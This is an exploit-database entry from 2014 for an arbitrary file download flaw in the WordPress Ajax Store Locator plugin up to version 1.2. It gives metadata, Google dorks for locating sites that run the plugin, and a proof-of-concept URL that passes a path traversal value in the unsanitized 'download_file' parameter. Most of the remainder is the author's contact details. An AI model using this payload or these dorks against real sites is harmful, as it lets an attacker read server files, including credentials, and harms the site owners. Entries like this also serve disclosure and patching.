WordPress Plugin Ajax Store Locator 1.2 - Arbitrary File Download

Author: Claudio Viviani
type: webapps
platform: php
port: 
date_added: 2014-12-10 
date_updated: 2014-12-10 
verified: 0 
codes: OSVDB-115595 
tags: 
aliases:  
screenshot_url:  
application_url: 

######################

# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

# Software Link : Premium

# Dork Google: inurl:ajax-store-locator
#              index of ajax-store-locator

# Date : 2014-12-06

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]

"download_file" variable is not sanitized.


#####################

Discovered By : Claudio Viviani
                http://www.homelab.it

                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################